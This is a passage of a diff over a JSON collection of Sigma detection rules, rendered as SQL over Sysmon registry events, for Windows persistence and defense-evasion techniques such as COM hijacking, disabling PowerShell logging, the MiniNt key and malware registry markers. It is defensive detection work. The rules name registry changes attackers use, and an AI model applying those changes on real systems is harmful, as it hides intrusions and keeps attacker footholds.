Persistence Via COM Search Order Hijacking", + "id": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", + "status": "experimental", + "description": "Detects potential COM object hijacking leveraging the COM Search Order", + "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Legitimate admin script" + "Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideClock' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAHealth' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCANetwork' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAPower' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAVolume' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowInfoTip' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowCompColor' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\') AND NOT (((Details LIKE '%\\%\\%systemroot\\%\\%\\\\system32\\\\%' ESCAPE '\\' OR Details LIKE '%\\%\\%systemroot\\%\\%\\\\SysWow64\\\\%' ESCAPE '\\')) OR ((Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\FileCoAuthLib64.dll%' ESCAPE '\\' OR Details LIKE '%\\\\FileSyncShell64.dll%' ESCAPE '\\' OR Details LIKE '%\\\\FileSyncApi64.dll%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\TeamsMeetingAddin\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\Microsoft.Teams.AddinLoader.dll%' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Roaming\\\\Dropbox\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\DropboxExt64.%.dll%' ESCAPE '\\') OR (Details LIKE '%TmopIEPlg.dll' ESCAPE '\\') OR ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Details LIKE '%\\\\FileRepository\\\\nvmdi.inf%' ESCAPE '\\') OR (Image LIKE '%\\\\MicrosoftEdgeUpdateComRegisterShell64.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\SYSTEM32\\\\dxdiag.exe' ESCAPE '\\') OR ((Details LIKE 'C:\\\\Windows\\\\pyshellext.amd64.dll' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\pyshellext.dll' ESCAPE '\\')) OR ((Details LIKE 'C:\\\\Windows\\\\system32\\\\dnssdX.dll' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\SysWOW64\\\\dnssdX.dll' ESCAPE '\\')) OR (Details LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR ((Details LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Details LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\%' ESCAPE '\\') OR (Details LIKE '%C:\\\\WINDOWS\\\\system32\\\\GamingServicesProxy.dll%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND Details LIKE '%C:\\\\Windows\\\\System32\\\\Autopilot.dll%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\' AND Details LIKE '%C:\\\\Windows\\\\System32\\\\SecurityHealth%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\InProcServer32\\\\(Default)' ESCAPE '\\')))" ], - "filename": "registry_set_hide_function_user.yml" + "filename": "registry_set_persistence_search_order.yml" }, { - "title": "Potential Persistence Using DebugPath", - "id": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "title": "ScreenSaver Registry Key Set", + "id": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", "status": "experimental", - "description": "Detects potential persistence using Appx DebugPath", - "author": "frack113", + "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "Legitimate use of screen saver" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ActivatableClasses\\\\Package\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\DebugPath' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PackagedAppXDebug\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE%' ESCAPE '\\' AND Details LIKE '%.scr' ESCAPE '\\') AND NOT ((Details LIKE '%C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_appx_debugger.yml" + "filename": "registry_set_scr_file_executed_by_rundll32.yml" }, { - "title": "Change User Account Associated with the FAX Service", - "id": "e3fdf743-f05b-4051-990a-b66919be1743", + "title": "PowerShell Logging Disabled Via Registry Key Tampering", + "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", "status": "experimental", - "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (Details LIKE '%NetworkService%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "registry_set_fax_change_service_user.yml" + "filename": "registry_set_powershell_logging_disabled.yml" }, { - "title": "Disable Windows Security Center Notifications", - "id": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", + "title": "Allow RDP Remote Assistance Feature", + "id": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", "status": "experimental", - "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", + "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate use of the feature (alerts should be investigated either way)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Windows\\\\CurrentVersion\\\\ImmersiveShell\\\\UseActionCenterExperience' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\fAllowToGetHelp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "registry_set_disable_security_center_notifications.yml" + "filename": "registry_set_allow_rdp_remote_assistance_feature.yml" }, { - "title": "Enable Microsoft Dynamic Data Exchange", - "id": "63647769-326d-4dde-a419-b925cc0caf42", - "status": "test", - "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", + "title": "Potential Persistence Using DebugPath", + "id": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "status": "experimental", + "description": "Detects potential persistence using Appx DebugPath", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1559.002" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\Word\\\\Security\\\\AllowDDE' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLaunch' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLookup' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ActivatableClasses\\\\Package\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\DebugPath' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PackagedAppXDebug\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\')))" ], - "filename": "registry_set_office_enable_dde.yml" + "filename": "registry_set_persistence_appx_debugger.yml" }, { - "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", - "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "title": "Potential Persistence Via Outlook Today Pages", + "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", "status": "experimental", - "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.t1112" ], "falsepositives": [ - "Probable legitimate applications. If you find these please add them to an exclusion list" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%\\%appdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" + "filename": "registry_set_persistence_outlook_todaypage.yml" }, { - "title": "Changing RDP Port to Non Standard Number", - "id": "509e84b9-a71a-40e0-834f-05470369bd1e", - "status": "test", - "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", + "title": "Registry Disable System Restore", + "id": "5de03871-5d46-4539-a82d-3aa992a69a83", + "status": "experimental", + "description": "Detects the modification of the registry to disable a system restore on the computer", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.010" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (Details = 'DWORD (0x00000d3d)'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "registry_set_change_rdp_port.yml" + "filename": "registry_set_disable_system_restore.yml" }, { - "title": "Common Autorun Keys Modification", - "id": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", + "title": "Potential Qakbot Registry Activity", + "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", + "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", + "author": "Hieu Tran", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows CE Services\\\\AutoStart%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\Setup\\\\CmdLine%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Ctf\\\\LangBarAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Handler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Htmlfile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Environment\\\\UserInitMprLogonScript%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\UrlSearchHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Desktop\\\\Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Classes\\\\Clsid\\\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\\\Inprocserver32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRunStore\\\\HKMU\\\\SOFTWARE\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\') OR Details IN ('{314111c7-a502-11d2-bbca-00c04f8ec294}', '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}', '{42089D2D-912D-4018-9087-2B87803E93FB}', '{5504BE45-A83B-4808-900A-3A5C36E7F77A}', '{807583E5-5146-11D5-A672-00B0D022E945}')) OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{8A69D345-D564-463c-AFF1-A69D9E530F96}\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{89820200-ECBD-11cf-8B85-00AA005B4383}\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" ], - "filename": "registry_set_asep_reg_keys_modification_common.yml" + "filename": "registry_event_malware_qakbot_registry.yml" }, { - "title": "WinSock2 Autorun Keys Modification", - "id": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", + "title": "Disable Security Events Logging Adding Reg Key MiniNt", + "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WinSock2\\\\Parameters%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Protocol\\_Catalog9\\\\Catalog\\_Entries%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NameSpace\\_Catalog5\\\\Catalog\\_Entries%' ESCAPE '\\')) AND NOT (Details = '(Empty)' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\MsiExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" ], - "filename": "registry_set_asep_reg_keys_modification_winsock2.yml" + "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" }, { - "title": "New Root or CA or AuthRoot Certificate to Store", - "id": "d223b46b-5621-4037-88fe-fda32eead684", - "status": "experimental", - "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", - "author": "frack113", + "title": "Registry Entries For Azorult Malware", + "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", + "status": "test", + "description": "Detects the presence of a registry key created during Azorult execution", + "author": "Trent Liffick", "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Blob' ESCAPE '\\' AND Details = 'Binary Data')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" ], - "filename": "registry_set_install_root_or_ca_certificat.yml" + "filename": "registry_event_mal_azorult.yml" }, { - "title": "IE Change Domain Zone", - "id": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", - "status": "experimental", - "description": "Hides the file extension through modification of the registry", - "author": "frack113", + "title": "DLL Load via LSASS", + "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "status": "test", + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.persistence", - "attack.t1137" + "attack.t1547.008" ], "falsepositives": [ - "Administrative scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Domains\\\\%' ESCAPE '\\') AND NOT (Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', '(Empty)')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" ], - "filename": "registry_set_change_security_zones.yml" + "filename": 